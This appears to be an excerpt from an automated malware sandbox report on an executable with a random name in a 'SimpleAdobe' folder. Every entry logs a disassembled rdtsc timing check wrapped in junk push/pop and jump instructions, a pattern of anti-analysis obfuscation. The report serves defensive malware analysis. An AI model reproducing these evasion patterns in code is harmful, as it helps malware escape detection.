Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C35465 second address: C3546B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3790D second address: C37919 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F0D2259B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C37919 second address: C3791E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3791E second address: C3792C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007F7F0D2259B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3792C second address: C37936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C37936 second address: C37944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C37944 second address: C37949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3A561 second address: C3A5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D2259C4h 0x00000009 jmp 00007F7F0D2259C4h 0x0000000e jmp 00007F7F0D2259C0h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3A5A2 second address: C3A5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D21AE18h 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3A716 second address: C3A734 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F7F0D2259BBh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnl 00007F7F0D2259B6h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3A734 second address: C3A748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D21AE0Ch 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3A748 second address: C3A74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3FF66 second address: C3FF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 ja 00007F7F0D21AE06h 0x0000000f jmp 00007F7F0D21AE0Fh 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3F157 second address: C3F15B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3F15B second address: C3F163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3F163 second address: C3F16F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3F894 second address: C3F8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7F0D21AE06h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3FA12 second address: C3FA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7F0D2259B6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3FA1C second address: C3FA20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C3FA20 second address: C3FA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F0D2259C8h 0x0000000b je 00007F7F0D2259BAh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push esi 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C45C15 second address: C45C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C45DF7 second address: C45DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C45DFD second address: C45E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C45E03 second address: C45E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF184B second address: BF1860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF1860 second address: BF18AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F7F0D2259BCh 0x00000011 mov ebx, dword ptr [ebp+12495970h] 0x00000017 jno 00007F7F0D2259BCh 0x0000001d add eax, ebx 0x0000001f xor dword ptr [ebp+122D323Dh], eax 0x00000025 push eax 0x00000026 pushad 0x00000027 jc 00007F7F0D2259BCh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF18AD second address: BF193A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007F7F0D21AE0Fh 0x0000000a pop edx 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F7F0D21AE08h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F7F0D21AE08h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 pushad 0x00000046 and si, 4528h 0x0000004b jmp 00007F7F0D21AE14h 0x00000050 popad 0x00000051 nop 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F7F0D21AE14h 0x00000059 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C46363 second address: C46369 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C46369 second address: C4637D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F7F0D21AE06h 0x0000000e je 00007F7F0D21AE06h 0x00000014 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C49DFA second address: C49E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C50C55 second address: C50C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE13h 0x00000007 jmp 00007F7F0D21AE0Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C50C78 second address: C50C91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jg 00007F7F0D2259B6h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C5137C second address: C51383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C516A0 second address: C516D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F7F0D2259BCh 0x0000000e jng 00007F7F0D2259B6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007F7F0D2259C7h 0x0000001d jo 00007F7F0D2259BCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C516D6 second address: C516DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C51C82 second address: C51C8E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F0D2259B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C5225E second address: C52275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F0D21AE0Fh 0x0000000d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C52275 second address: C5227C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C525C4 second address: C525FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D21AE14h 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7F0D21AE19h 0x00000015 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C57844 second address: C57848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C57848 second address: C57854 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C57854 second address: C5785A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C5785A second address: C5785E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BA45AE second address: BA45B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C5B838 second address: C5B83C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C5AA8C second address: C5AA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C5AFF7 second address: C5AFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C5AFFB second address: C5AFFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C5B154 second address: C5B16F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F0D21AE12h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C5B16F second address: C5B173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C5B3D5 second address: C5B3D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C65DE3 second address: C65DFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C1h 0x00000007 jc 00007F7F0D2259BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C65DFE second address: C65E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F7F0D21AE06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C63FF2 second address: C64008 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F0D2259B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7F0D2259BAh 0x00000011 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C64008 second address: C64040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F7F0D21AE06h 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F7F0D21AE06h 0x00000011 jmp 00007F7F0D21AE0Fh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F7F0D21AE08h 0x00000021 push edi 0x00000022 pop edi 0x00000023 pushad 0x00000024 jne 00007F7F0D21AE06h 0x0000002a push edx 0x0000002b pop edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C64040 second address: C64045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C64045 second address: C6404A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C6475A second address: C64777 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C648D3 second address: C648E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 jnp 00007F7F0D21AE08h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C64CF8 second address: C64D07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F7F0D2259B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C64D07 second address: C64D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C64D14 second address: C64D50 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F0D2259B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F7F0D2259C9h 0x00000010 push eax 0x00000011 pop eax 0x00000012 js 00007F7F0D2259B6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7F0D2259BBh 0x00000022 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C65C03 second address: C65C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C65C09 second address: C65C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C65C0D second address: C65C52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE18h 0x00000007 jmp 00007F7F0D21AE13h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F7F0D21AE16h 0x00000013 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C65C52 second address: C65C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259BDh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7F0D2259C2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C65C77 second address: C65C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C6CA32 second address: C6CA47 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F7F0D2259BCh 0x0000000a pop esi 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C6CA47 second address: C6CA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C6C411 second address: C6C415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C6C415 second address: C6C431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D21AE12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C6C431 second address: C6C435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C6C435 second address: C6C441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C6C5BF second address: C6C5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D2259C8h 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C6C5DB second address: C6C5E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F7F0D21AE06h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C6C72B second address: C6C746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F7F0D2259C4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C6C746 second address: C6C765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jg 00007F7F0D21AE06h 0x00000010 jmp 00007F7F0D21AE0Ch 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C6C765 second address: C6C76A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C7B31A second address: C7B333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007F7F0D21AE0Ch 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
